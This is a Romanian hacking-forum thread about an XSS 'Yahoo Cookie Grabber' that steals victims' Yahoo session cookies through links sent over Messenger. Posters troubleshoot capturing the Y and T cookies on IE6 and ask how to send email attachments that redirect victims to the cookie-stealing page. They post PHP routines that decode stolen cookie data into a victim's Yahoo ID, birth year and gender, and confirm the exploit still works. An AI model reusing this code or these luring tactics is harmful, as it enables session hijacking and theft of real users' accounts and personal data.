[RST] Professional Yahoo Cookie Grabber [de actualitate]

[Guest Nemessis]

http://rstcenter.com/forum/cum-sa-iti-ascunzi-xss-si-yahoo-xss-t8101.rst

[lucian]

Stie careva totusi de ce nu vine shi Y cu T ?

nu intodeauna pe IE6 vine Y si T .... incerca sa bifezi la yahoo mail "Keep me signed in .." si dai o proba la tine in comp ... si vezi ca o sa mearga ... .. cu problema asta m-am lovit cand am folosit prima data grabberu .... mergea f bine pe mozilla iar pe IE6 nu mergea .... pur si simplu pe unele compuri nu merge ...

[Danny]

EDIT

Gata.. i-am dat de capat ... problema e in felu urmator .. cand dai click pe messenger si se deschide cu mozilla, trimite cookieul direct cu Y si T (fara sa fii logat pe site la yahoo).

Cand dai click pe link, tot in messenger, dar se deschide cu IE, trimite tot felu de prostii, dar fara Y si T. Asa ca m-am logat pe site la yahoo, apoi am inchis siteul si am dat iar click pe link la messenger si surpriza, a venit si Y cu T! Deci, ce ar trebui sa fac acum sa mearga si pe IE, e sa prind logata victima... cum sa fac asta? Revin la vechea metoda, dau mail ...

Acum am o intrebare .. se poate face vreo pagina html ... apoi trimisa in mail ca attachment shi cand deschide mailu sa redirectioneze direct la pagina mea de "furat" cookieuri?

[BlaCkIcE]

Super Tare TEAM

Tineti-o tot asa si mai multe :wink:

[andrewboy]

m`am gandit sa incerc sa modific scriptul putin........astept parerile celor care au facut scriptul original sa`mi zica daca ce am facut eu este mai rapid in executie (cel putin teoretic dupa parerea mea este)sau nu ca scriptul original..;)

Link: http://www.speedyshare.com/829403847.html

Sper sa nu va deranjeze ca am facut asta...

[Guest Nemessis]

Pune si screenshot te rog andrewboy daca exista imbunatatiri vizibile cu ochiul liber. Chiar va rugam sa incercati sa imbunatatiti scriptul si sa impartiti cu noi realizarile voastre.

[andrewboy]

function GetID ($Name) {

      $char = array ("a" => "k",
                    "b" => "l",
                    "c" => "m",
                    "d" => "n",
					"e" => "o",
					"f" => "p",
					"g" => "q",
					"h" => "r",
					"i" => "s",
					"j" => "t",
					"k" => "u",
					"l" => "v",
					"m" => "w",
					"n" => "x",
					"o" => "y",
					"p" => "z",
					"q" => "0",
					"r" => "1",
					"s" => "2",
					"t" => "3",
					"u" => "4",
					"v" => "5",
					"w" => "7",
					"x" => "8",
					"y" => "9",
					"z" => "6",
					"0" => "a",
					"1" => "b",
					"2" => "c",
					"3" => "d",
					"4" => "e",
					"5" => "f",
					"6" => "g",
					"7" => "h",
					"8" => "i",
					"9" => "j");
while (list ($enc, $plain) = each ($char)) {
$Name = str_replace($enc,$plain,$Name);
return $Name;
}

function GetYear($Year) {
      $Years = array ("00" => "1900",
                    "01" => "1901",
                    "02" => "1902",
                    "03" => "1903",
					"04" => "1904",
					"05" => "1905",
					"06" => "1906",
					"07" => "1907",
					"08" => "1908",
					"09" => "1909",
					"0a" => "1910",
					"0b" => "1911",
					"0c" => "1912",
					"0d" => "1913",
					"0e" => "1914",
					"0f" => "1915",
					"0g" => "1916",
					"0h" => "1917",
					"0i" => "1918",
					"0j" => "1919",
					"0k" => "1920",
					"0l" => "1921",
					"0m" => "1922",
					"0n" => "1923",
					"0o" => "1924",
					"0p" => "1925",
					"0q" => "1926",
					"0r" => "1927",
					"0s" => "1928",
					"0t" => "1929",
					"0u" => "1930",
					"0v" => "1931",
					"10" => "1932",
					"11" => "1933",
					"12" => "1934",
					"13" => "1935",
					"14" => "1936",
					"15" => "1937",
					"16" => "1938",
					"17" => "1939",
					"18" => "1940",
					"19" => "1941",
					"1a" => "1942",
					"1b" => "1943",
					"1c" => "1944",
					"1d" => "1945",
					"1e" => "1946",
					"1f" => "1947",
					"1g" => "1948",
					"1h" => "1949",
					"1i" => "1950",
					"1j" => "1951",
					"1k" => "1952",
					"1l" => "1953",
					"1m" => "1954",
					"1n" => "1955",
					"1o" => "1956",
					"1p" => "1957",
					"1q" => "1958",
					"1r" => "1959",
					"1s" => "1960",
					"1t" => "1961",
					"1u" => "1962",
					"1v" => "1963",
					"20" => "1964",
					"21" => "1965",
					"22" => "1966",
					"23" => "1967",
					"24" => "1968",
					"25" => "1969",
					"26" => "1970",
					"27" => "1971",
					"28" => "1972",
					"29" => "1973",
					"2a" => "1974",
					"2b" => "1975",
					"2c" => "1976",
					"2d" => "1977",
					"2e" => "1978",
					"2f" => "1979",
					"2g" => "1980",
					"2h" => "1981",
					"2i" => "1982",
					"2j" => "1983",
					"2k" => "1984",
					"2l" => "1985",
					"2m" => "1986",
					"2n" => "1987",
					"2o" => "1988",
					"2p" => "1989",
					"2q" => "1990",
					"2r" => "1991",
					"2s" => "1992",
					"2t" => "1993",
					"2u" => "1994",
					"2v" => "1995",
					"30" => "1996",
					"31" => "1997",
					"32" => "1998",
					"33" => "1999",
					"34" => "2000",
					"35" => "2001",
					"36" => "2002",
					"37" => "2003",
					"38" => "WTF this motherfucker is less than 4 years old",
					"39" => "WTF this motherfucker is less than 3 years old",
					"3a" => "WTF this motherfucker is less than 2 years old",
					"3b" => "WTF this motherfucker is less than 1 years old",
					"3c" => "WTF this motherfucker is not born",					
					);

while (list($cr,$YearX) = each($Years) {
if ($Year == $cr) return $YearX; 
}
}

Aceste doua functii sunt facute de mn si afla numele si anul,as vrea sa stiu daca intradevar se va vedea vreo modificare in viteza incarcarii paginii(considerand ca scriptul este incarcat pe un host slab)!!Am sa incerc sa le fac si mai eficiente aceste functii...dar in graba(merg)!

Edit:este posibil folosirea expresiilor regulate in aces caz?

ceva de genu

$string=trim( ereg_replace( "[^a-z0-9]", " ", $string ) );

insa nu am idee cum as putea face expresia regulata care in cazul in care este folosit unul dintre caracterele "[^a-z0-9]" sa`l inlocuiasca cu acel caracter respectiv fiecarei litere/cifre din expresie(imi pare rau pentru exprimare)

[tw8]

insa nu am idee cum as putea face expresia regulata care in cazul in care este folosit unul dintre caracterele "[^a-z0-9]" sa`l inlocuiasca cu acel caracter respectiv fiecarei litere/cifre din expresie(imi pare rau pentru exprimare)

Nu e mare lucru asta . Exista asta.

Cat despre imbunatatirea ta ... nu e mare lucru.

Eu am facut imbunatatiri mult mai bune (nu folosesc nici array si nici atatea if-uri pentru anul nasterii si nick), si, daca Nemessis si BanKai vor, o sa le dau scriptul meu pentru a face cea de-a 3 versiune a grabberului.

[andrewboy]

tw8 nu te`am intrebat ce ai facut tu....si daca aruncai o mica privire peste cod vedeai ca acelasi lucru am facut.. ,cel putin in prima functia ....uita`te intai si apoi vorbeste....arata si mie acel cod imbunatatit? adica de ce nu il postezi? ca oricum tie creditele iti vor fi date in cazul folosirii lor:D

[tw8]

tw8 nu te`am intrebat ce ai facut tu....si daca aruncai o mica privire peste cod vedeai ca acelasi lucru am facut.. ,cel putin in prima functia ....uita`te intai si apoi vorbeste....arata si mie acel cod imbunatatit? adica de ce nu il postezi? ca oricum tie creditele iti vor fi date in cazul folosirii lor:D

Il voi posta imediat, trebuie mai intai sa il testez si nu gasesc un hosting calumea.

Cand il voi posta, astept sa iti retragi injuriile .

[Guest Nemessis]

tw8 pune sursa si nu mai comenta

[tw8]

tw8 pune sursa si nu mai comenta

Ok. Nu am apucat sa il testez, dar bazandu-ma pe cateva observatii matematice, am ajuns la codul asta (asta afla id + anul nasterii):

	//kw3rln
	$aux=$Y; 
	$aux=explode('l=', $aux, -1); 
	$aux=explode('/o', $aux[1], -1); 
	$aux=$c[0]; 
	$id = '';
	for ($i=0; $i<strlen($aux); $i++) 
	{ 
		$ascii = ord($aux{$i});
		$c = $aux{$i};
		if ($ascii>=48 &&$ascii<=57){$c=chr($ascii+49);}
		elseif ($ascii>=97 && $ascii<=112){$c=chr($ascii+10);}
		elseif ($ascii>=113 && ascii<=122){$c = chr($ascii-65);}
		elseif ($ascii==43){$c = chr(32);}
		$id = $id . $c;		
	}
	$id = htmlspecialchars($id); 
// end kw3rln

// start BanKai
$aux = explode('&p=', $cookie);
$aux = $aux[1];
$aux = explode('&', $aux);
$aux = $aux[0];

if ($aux{0} == 'm'){$gender = 'MALE';}
elseif ($aux{0} == 'f'){$gender = 'FEMALE';}
else{$gender = '#ERROR';}

if (ord($aux{1})>=48 && ord($aux{1})<=51)
	{
	if(ord($aux{2}) >= 48 && ord($aux{2})<=57){$year = 1900 + $aux{1}.$aux{2} + 22 * (ord($aux{1})-48);}
	elseif(ord($aux{2})>=97 && ord($aux{2})<=118){$year = 1900 + 22 * (ord($aux{1})-48) + ord($aux{2}) - 87 + 10 * (ord($aux{1})-48);}
	else{$year = '#ERROR';}
	}
else {$year = '#ERROR';}

Ar trebui sa mearga perfect, daca vreti, il puteti testa. Desigur, va trebui sa faceti cateva modificari in variabila $html, pentru ca $buni devine, in scriptul meu $id.

Acum, andrewboy, compara martzoaga tau cu scriptul meu .

LE: Am modificat ceva. Incercati-l acum.

[andrewboy]

poi nah ce sa zik...e mai bun ca al meu,nu l`am testat.....bravo.....nu stiu daca te`ar interesa,dar la acelasi lucru ma gandisem(ma refer la observatiile matematice) si ma pregateam sa le pun in aplicare,insa nu mai are rost...felicitari..;).....puteai sa`i zici mai frumos la scriptul meu:))... daca ai reusit sa faci ceva de acum nu cred ca trebuie sa te lauzi asa:D;)...parerea mea,si nu ti`am zis nimic mai devreme in sens rau,daca ti s`a parut asta este..

[lucian]

........................................

while (list($cr,$YearX) = each($Years) {
if ($Year = $cr) return $YearX; 
}

......................................

if ($Year == $cr) return $YearX;

compari nu atribui

[andrewboy]

scuze,mi`a scapat:D;) ...ms pt observatie;))

[hirosima]

puteti sa mia puneti inca odata linkul, mie cel putin nu imi functioneaza, ar fi mia bine sa fie pe un alt server.

Multumesc anticipat

[MaHaReT]

Issues

Some ISPs intentionally block sharing sites like RapidShare to make better use of bandwidth.

On 19 January 2007, news broke that German collections agency GEMA had claimed to have won a temporary injunction against both RapidShare.de and RapidShare.com. "The latter is said to have used copyright protected works of GEMA members in an unlawful fashion,".[4] To date RapidShare has claimed not to have any knowledge of the content uploaded by the users and of not being in a position to control the content. Through its injunctions the District Court in Cologne had now however made it clear to the company that the fact that it was the users and not the operator of the services that uploaded the content onto the sites did not, from a legal point of view, lessen the operator’s liability for copyright infringements that occurred within the context of the services, the spokesman added.

Sursa : http://en.wikipedia.org/wiki/RapidShare

De aia nu merge linku

Si-a revenit

[hirosima]

puteti pune va rog pe un al host. Multumes frumos

[raz3k]

merge, cel putin la mine nu mergea pt ca era arp spoofing-ul in floare din cauza unui virus ce actioneaza prin iframe-uri...

bravo celor care au stat sa-si bata capu cu XSS si au nascut codu asta

asteptam cu nerabdare xss-uri de hi5 care merg

[GoodKat]

Good shit !

Bravo RST ! :twisted:

[drealecs]

interesant

[raz3k]

Nu mai merge xss-ul din google_adsense.php ... nu mai incarca js-ul.

s-au prins baietii de la yahoo...

Asteptam cu nerabdare si cu bratele deschise un xss functional sa-l bagam in google_adsense.php.

BTW: buna treaba ati facut cu jucaria asta, felicitari la toata echipa!

[Guest Nemessis]

Functioneaza perfect inca. Ai gresit tu undeva. Testat acum 20 secunde.

[raz3k]

dap, mii de scuze, merge snur, ieri a facut figuri. sorry de dezinformare

[raz3k]

Nu stiu daca e caz izolat, face numai la mine sau face yahoo modificari dar exact acum mie nu-mi merge linkul ht tp://add.yahoo.com/fast/change

...defapt nu merge nici ht tp://add.yahoo.com/

voua va merge sau sunt eu paranoic ?